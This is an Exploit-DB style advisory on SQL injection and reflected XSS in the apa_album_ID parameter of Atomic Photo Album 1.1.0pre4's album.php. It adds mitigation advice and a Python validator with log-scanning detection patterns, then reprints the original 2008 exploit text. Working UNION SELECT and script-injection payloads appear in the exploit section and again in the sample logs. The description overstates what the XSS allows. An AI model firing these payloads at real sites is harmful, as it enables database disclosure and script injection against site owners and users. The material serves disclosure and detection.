Vendor: Atomic Photo Album
By: d3v1l
CVSS: 7.5 (HIGH)
Vulnerability: SQL Injection & XSS
CWE: 89 (SQL Injection) & 79 (XSS)
Product Name: Atomic Photo Album
Affected Version From: 1.1.0pre4
Affected Version To: 1.1.0pre4
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Atomic Photo Album 1.1.0pre4 [album.php] – Multiple Remote Vulnerabilities

Atomic Photo Album 1.1.0pre4 is vulnerable to SQL injection and cross-site scripting (XSS) through the apa_album_ID parameter of album.php. An attacker can inject SQL into the database query built from this parameter to gain access to the database and execute arbitrary code on the vulnerable system, and can inject JavaScript that the same parameter reflects back into the page to gain access to the vulnerable system.

Mitigation:

Input validation and output encoding prevent both issues: validate apa_album_ID as an integer before it reaches the database query (or bind it as a parameter of a prepared statement) to stop the SQL injection, and HTML-encode the value wherever album.php echoes it back to stop the XSS.
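As an added example (not code from the advisory or from Atomic Photo Album), the check below enforces the integer contract that apa_album_ID should have and, for detection, scans web-server access-log lines for album.php requests whose parameter breaks that contract, labelling them against the two payload shapes published above. The log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Contract for album.php: apa_album_ID is a positive integer. Anything else must be
# rejected before it can reach a SQL query or be reflected into HTML.
ALBUM_ID_RE = re.compile(r"[1-9][0-9]{0,9}")

def validate_album_id(raw):
    """Return the album id as int, or None when the value violates the contract."""
    if raw is None or not ALBUM_ID_RE.fullmatch(raw.strip()):
        return None
    return int(raw.strip())

# Signatures of the two payload shapes published for this parameter (detection only).
SQLI_RE = re.compile(r"union\s+select|concat_ws\s*\(|/\*", re.I)
XSS_RE = re.compile(r"<\s*script|['\"]\s*>", re.I)

def classify(raw):
    """Label a rejected apa_album_ID value as 'sqli', 'xss' or plain 'invalid'."""
    if SQLI_RE.search(raw):
        return "sqli"
    if XSS_RE.search(raw):
        return "xss"
    return "invalid"

# Request-line extractor for Apache/nginx style access logs.
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_access_log(lines):
    """Return (line_no, decoded_value, label) for album.php requests whose
    apa_album_ID is not a positive integer. parse_qs percent-decodes for us."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/album.php"):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("apa_album_ID", []):
            if validate_album_id(raw) is None:
                hits.append((n, raw, classify(raw)))
    return hits

# Constructed sample log: one benign request, the two published payloads, one unrelated hit.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Sep/2008:10:01:02 +0000] "GET /new/fotos/album.php?apa_album_ID=1 HTTP/1.1" 200 5123',
    '10.0.0.5 - - [25/Sep/2008:10:01:09 +0000] "GET /new/fotos/album.php?apa_album_ID=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())/* HTTP/1.1" 200 5301',
    '10.0.0.7 - - [25/Sep/2008:10:02:15 +0000] "GET /new/fotos/album.php?apa_album_ID=%3E%27%3E%3Cscript%3Ealert(1337)%3C/script%3E. HTTP/1.1" 200 5210',
    '10.0.0.9 - - [25/Sep/2008:10:03:00 +0000] "GET /new/fotos/index.php HTTP/1.1" 200 2048',
]
```

Running `scan_access_log(SAMPLE_LOG)` flags lines 2 and 3 as `sqli` and `xss` respectively and ignores the benign album request and the unrelated page.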

Exploit-DB raw data:

[~]-----------------------------------------------------------------------
[~] Atomic Photo Album 1.1.0pre4 [album.php] - Multiple Remote Vulnerabilities
[~]
[~] http://atomicpa.sourceforge.net
[~] ----------------------------------------------------------
[~] Bug found by d3v1l
[~]
[~] Date: 25.09.2008
[~]
[~]
[~] d3v1l@spoofer.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest| Gibon| Pig       AND      milw0rm staff
[~]-------------------------------------------------------------
[~] Exploit :- SQL Injection
[~]
[~] http://site.com/album.php?apa_album_ID=1 UNION SELECT concat_ws(0x3a,version(),database(),user())/*
[~]
[~] Demo :-
[~]
[~] http://www.site.com/new/fotos/album.php?apa_album_ID=1 UNION SELECT concat_ws(0x3a,version(),database(),user())/*
[~]
[~]---------------------------------------------------------------------------------------------------------------------------
[~]
[~] Exploit :- XSS (cross site scripting)
[~]
[~] http://site.com/album.php?apa_album_ID=>'><script>alert(1337)</script>.
[~]
[~] Demo :-
[~]
[~] http://www.site.com/new/fotos/album.php?apa_album_ID=>'><script>alert(1337)</script>.
[~]
[~]----------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2008-09-25]